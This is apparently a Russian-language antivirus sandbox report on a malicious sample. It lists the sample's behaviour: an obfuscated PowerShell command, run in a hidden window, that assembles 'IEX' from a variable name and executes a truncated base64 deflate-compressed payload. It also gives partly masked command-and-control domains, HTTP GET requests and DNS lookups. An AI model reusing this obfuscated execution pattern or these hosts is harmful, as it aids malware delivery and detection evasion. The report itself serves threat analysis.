Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $verbosEprefErENCE.TOStrinG()[1,3]+'X'-jOIN'')(new-objEcT sysTem.IO.CompressiON.deflATEsTreaM( [SYSteM.iO.MeMorystrEAM] [sysTem.coNvert]::frOmBASE64strInG( 'dZDfa8IwEMf/lT4UYnEmW3EIloLM4ctAC...
Сетевая активность
Подключается к
- 'ad###ssanat.com':80
- 'br########e.b2ldigitalprojects.com':80
TCP
Запросы HTTP GET
- http://www.ad###ssanat.com/z/
- http://ad###ssanat.com/z/
UDP
- DNS ASK ad###ssanat.com
- DNS ASK ad###sict.com
- DNS ASK dq####qwqwd.info
- DNS ASK ap#####ncenetwork.com
- DNS ASK br########e.b2ldigitalprojects.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $verbosEprefErENCE.TOStrinG()[1,3]+'X'-jOIN'')(new-objEcT sysTem.IO.CompressiON.deflATEsTreaM( [SYSteM.iO.MeMorystrEAM] [sysTem.coNvert]::frOmBASE64strInG( 'dZDfa8IwEMf/lT4UYnEmW3EIloLM4ctAC...' (со скрытым окном)
